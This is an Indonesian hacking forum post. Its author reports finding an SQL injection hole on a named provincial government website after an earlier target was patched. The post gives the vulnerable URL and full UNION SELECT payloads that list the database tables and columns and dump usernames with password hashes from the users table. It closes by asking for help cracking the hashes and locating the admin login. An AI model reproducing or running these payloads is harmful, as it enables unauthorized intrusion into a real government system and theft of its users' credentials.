ok langsung aja, karena bug sqli di situs di http://www.nexian.co.id/ udah di patch maka saya coba nyari situs yg lain, terus ketemu deh bug sqli di http://bantenprov.go.id/
ini dia holenya
Code: Select all
http://bantenprov.go.id/get_page.php?link=brt_dtl&id=6932'
Code: Select all
http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=database%28%29--
ini isi column dari table pengguna
Code: Select all
http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.columns%20where%20table_name=0x70656e6767756e61%20%20--
dan ini dia hasilnya
Code: Select all
http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28user_name,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20pengguna
tapi sayangnya saya belum dapat login pagenya dan hashnya tidak berhasil saya crack, tolong bantuannya ya
:kaca: :kaca: :kaca: